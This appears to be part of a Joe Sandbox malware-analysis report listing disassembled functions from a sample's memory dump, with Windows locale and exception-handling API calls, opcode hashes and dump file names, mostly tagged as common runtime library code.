Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 009ECC32
IsValidCodePage.KERNEL32(00000000), ref: 009ECC7B
IsValidLocale.KERNEL32(?,00000001), ref: 009ECC8A
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009ECCD2
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009ECCF1

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1ff1df8671473bd99503e7e38b8d6859b5e360f09c0dfe96c9140c5df5e1734f
Instruction ID: 958303a2128be79cac3fd266e0ea20e00b049c2b228237e1f514c1f4aa6c25b0
Opcode Fuzzy Hash: 1ff1df8671473bd99503e7e38b8d6859b5e360f09c0dfe96c9140c5df5e1734f
Instruction Fuzzy Hash: 0E5181B2A00249ABDB12DFA6CC45BBE73BCBF44700F184869F995E7191EB709D41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009EC1C2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

GetACP.KERNEL32(?,?,?,?,?,?,009E17C6,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 009EC283
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,009E17C6,?,?,?,00000055,?,-00000050,?,?), ref: 009EC2AE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 009EC411

Strings

utf8, xrefs: 009EC380

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: aee5f46b5f74917b6096d8bda93ce76fb169e050ce2b6015e8442b37a6b68623
Instruction ID: 9bafadcb3d251ddcbdd34f9875bfc5d4d05ef18131a0ddd26615b9933da32b49
Opcode Fuzzy Hash: aee5f46b5f74917b6096d8bda93ce76fb169e050ce2b6015e8442b37a6b68623
Instruction Fuzzy Hash: F97137B1604346AADB26AB76CC42BB773ACEF84700F148429F655D7181FB71ED4287A0

Uniqueness

Uniqueness Score: -1.00%

Function 009E4713 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 009E47A0

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
Instruction ID: dfaca34ab8a45b89629b7535a65423bc0415cbaea190cb4835e00b783a9bece7
Opcode Fuzzy Hash: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
Instruction Fuzzy Hash: C6B14932D042C69FDB16CF69C8817FEBBE9EF59310F15816AE904AB342D2359D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009D6D9F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009D6DAB
IsDebuggerPresent.KERNEL32 ref: 009D6E77
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009D6E90
UnhandledExceptionFilter.KERNEL32(?), ref: 009D6E9A

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 2a2fb75a3ecd6e72fe813ebe0141e73479251735e3384d5ec3e42d18216a258c
Instruction ID: d9fd3013df66970a9a0031300094ab1572783d320ac14f9c57e318e0fcd7cc49
Opcode Fuzzy Hash: 2a2fb75a3ecd6e72fe813ebe0141e73479251735e3384d5ec3e42d18216a258c
Instruction Fuzzy Hash: CB31F775D45218DBDF20DFA4DD49BCDBBB8AF48300F1081AAE50CAB250EB719A84DF55

Uniqueness

Uniqueness Score: -1.00%

Function 009EC5D5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009EC629
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009EC673
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009EC739

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f3f95c12862025b556f3edbcd3d622ca791293609b8b08f06f9018a40a4603b0
Instruction ID: 3e3efd2a30364fa802668829085347d76bafc6a3f8bcfd828d44cc5ba02a72be
Opcode Fuzzy Hash: f3f95c12862025b556f3edbcd3d622ca791293609b8b08f06f9018a40a4603b0
Instruction Fuzzy Hash: D0618EB1510247DBEB2A9F2ACD82BBA77A8EF44300F108179E945D6281E735DD42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009DAAD3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009DABCB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009DABD5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 009DABE2

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a457b4d41e4484de510017d90b039979d3b6047eecf10761b782d1da6c31bf6f
Instruction ID: e1f1cb307ec6f8868d48f1eb31f57c59fe465ef16be399b51be3949df8d353ef
Opcode Fuzzy Hash: a457b4d41e4484de510017d90b039979d3b6047eecf10761b782d1da6c31bf6f
Instruction Fuzzy Hash: 0E31D475951218ABCB21DF68DD88B9DBBB8BF08310F5081DAE41CA7250EB749F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D79F Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 761COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 00A1D877

Part of subcall function 00A19FA0: __call_reportfault.LIBCMT ref: 00A19FAD

Strings

T, xrefs: 00A1D948

Memory Dump Source

Source File: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __call_reportfault__invoke_watson
String ID: T
API String ID: 3340580077-3187964512
Opcode ID: ead97eb45e45b6b9a9b289cf902855ac08d67e93d49c29dbfd04bf8f162c7824
Instruction ID: 3b171f61095eb7a943d08fefa33bd0c25b19e4af1a2b8b8493ce3a33ab5be5d0
Opcode Fuzzy Hash: ead97eb45e45b6b9a9b289cf902855ac08d67e93d49c29dbfd04bf8f162c7824
Instruction Fuzzy Hash: A1529072E0465ACFDF24CFA8C4813EEB7B1FF54340F55816AD806AB281E7749A85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 009DFBC0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec56dfda8af456639c14d8df237e0fd5c170a1e93aa038304b0efb289d9d672
Instruction ID: 8839695f045ced7b9ce2ac848adf5db723df51b3b6b344759827589652600663
Opcode Fuzzy Hash: aec56dfda8af456639c14d8df237e0fd5c170a1e93aa038304b0efb289d9d672
Instruction Fuzzy Hash: 32F15F71E002199FDF14CFA9C8916ADB7B5FF89314F15826AE819AB391D7309E41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009E3CF3 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009E3CEE,?,?,00000008,?,?,009F1D65,00000000), ref: 009E3F20

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 9e6350201f86b5726e865e716b069b6a7a50c7b385ff650d763fced3ecadfd03
Instruction ID: aaf8a916205b217e55ba90306f8687207b426d7adce56322d6c6f68da78eff09
Opcode Fuzzy Hash: 9e6350201f86b5726e865e716b069b6a7a50c7b385ff650d763fced3ecadfd03
Instruction Fuzzy Hash: 14B11A316106499FD716CF29C48AB657BA0FF45364F25CA5CE89ACF2A1C335EE92CB40

Uniqueness

Uniqueness Score: -1.00%

Function 009E960E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54368a8b96b0321137cf682fa6572cf0a5d81fff0fa287a437043dc3c1e1ac93
Instruction ID: 73d483219cb0549425160af3f037a1341dbd1ad49de90961c176729c104db35b
Opcode Fuzzy Hash: 54368a8b96b0321137cf682fa6572cf0a5d81fff0fa287a437043dc3c1e1ac93
Instruction Fuzzy Hash: FA41C37580425DAFDF21DF6ACC89AEABBBCAF85304F1442D9E45DD3201DA319E848F50

Uniqueness

Uniqueness Score: -1.00%

Function 009DCC44 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 009DCDD2

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 76e3dcc94fb5e4be4e4a3930e63d813ef337e7fcb232ee8acb6e7a8a6f153541
Instruction ID: 4c3d675e7aaae7a3c2998dc911b368abf6419143b025dc581c18bfad69715595
Opcode Fuzzy Hash: 76e3dcc94fb5e4be4e4a3930e63d813ef337e7fcb232ee8acb6e7a8a6f153541
Instruction Fuzzy Hash: 4AC1C2F06806478FCB24CF68C9846BEBBAAAF45304F24CA1BE596D7391C734AD45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009EC828 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009EC87C

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 2c5444b5a9712b1c867147fbc7995d77e242ab3d102a8a6c27c4c6319530e2d8
Instruction ID: 41a410e31d37ad54801f06fbc9fb738479df2ef9fa0e2060da23bab29d1659c4
Opcode Fuzzy Hash: 2c5444b5a9712b1c867147fbc7995d77e242ab3d102a8a6c27c4c6319530e2d8
Instruction Fuzzy Hash: 7F21D4B2614286ABDF299B2BDD42FBA33ACEF44310B20807AF901D7141EB75ED01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009EC4AF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

EnumSystemLocalesW.KERNEL32(009EC5D5,00000001,00000000,?,-00000050,?,009ECC06,00000000,?,?,?,00000055,?), ref: 009EC521

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 014eb5e48748372f9cd49866f13964672d0203996f63920fbf175338062dd815
Instruction ID: fb84f7c753692df44f75d30ce4c52e8aba4cbfb3c07aded1a79ef39c3a3483d1
Opcode Fuzzy Hash: 014eb5e48748372f9cd49866f13964672d0203996f63920fbf175338062dd815
Instruction Fuzzy Hash: FE1129772047015FDB189F3AC8A167AB791FF84368B15442DE58687640EB71BD43C740

Uniqueness

Uniqueness Score: -1.00%

Function 009ECA57 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,009EC7F1,00000000,00000000,?), ref: 009ECA83

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b51e444709cb3ef312dd02b19985584254d601f7b471b76ce972dd3f03a950d0
Instruction ID: 333d2ff1fedd1af9eea729a7ecc7f43d94a0c082ec02116db9f85c1467786007
Opcode Fuzzy Hash: b51e444709cb3ef312dd02b19985584254d601f7b471b76ce972dd3f03a950d0
Instruction Fuzzy Hash: E1F0F97660015ABFDB25DA23CC09BBA775CEB40354F084435ED46A3140DA74FE42C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 009EC54A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

EnumSystemLocalesW.KERNEL32(009EC828,00000001,?,?,-00000050,?,009ECBCA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 009EC594

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4746ad9126556480524d2424e7d6f435dece6aaa51f382762786dc27074d696d
Instruction ID: 9571820e7b1fc8216785f0146a396be30f46cf2a8e10b920b49f515d9bd65c8a
Opcode Fuzzy Hash: 4746ad9126556480524d2424e7d6f435dece6aaa51f382762786dc27074d696d
Instruction Fuzzy Hash: 67F0F6763043445FDB159F77DC85A7A7B95EFC0768B05842CF9864B680CB72AD42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E57F3 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009DD9E4: EnterCriticalSection.KERNEL32(?,?,009E2DB8,?,009FD418,00000008,009E2F7C,?,?,?), ref: 009DD9F3

EnumSystemLocalesW.KERNEL32(009E57E6,00000001,009FD4D8,0000000C,009E5C15,00000000), ref: 009E582B

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d1ac28d9c95a3a8a59b3bf12bd52ab4e4171c4deb39e061694d8c58b4b2a0ebd
Instruction ID: 484e19aa78f8d9dcc5f5310b5de4239bbdcbb9129271eda6cdba9edf3eb6458b
Opcode Fuzzy Hash: d1ac28d9c95a3a8a59b3bf12bd52ab4e4171c4deb39e061694d8c58b4b2a0ebd
Instruction Fuzzy Hash: 7BF04972A58308DFD700EF99E842BAD77B0FB88728F10812AF8109B3A0CBB55904DF40

Uniqueness

Uniqueness Score: -1.00%

Function 009EC464 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009E30E0: GetLastError.KERNEL32(?,00000008,009E8F07,00000000,009DAC50), ref: 009E30E4
Part of subcall function 009E30E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 009E3186

EnumSystemLocalesW.KERNEL32(009EC3BD,00000001,?,?,?,009ECC28,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 009EC49B

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e82c22b351e8ec8dcda10ed632e9fee80e2bbabf4d2ff7614daf0a82d5b0ac3e
Instruction ID: 1d9bf65835248e1ebafc92d45da1cf4a03b305925ea3f5074668c8fbea382ac6
Opcode Fuzzy Hash: e82c22b351e8ec8dcda10ed632e9fee80e2bbabf4d2ff7614daf0a82d5b0ac3e
Instruction Fuzzy Hash: 69F0553630024457CB05AF37C855BBA7FA8EFC1760B0A8058FA4A8B290D6329D43C790

Uniqueness

Uniqueness Score: -1.00%

Function 009E5D19 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,009E232C,?,20001004,00000000,00000002,?,?,009E192E), ref: 009E5D4D

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

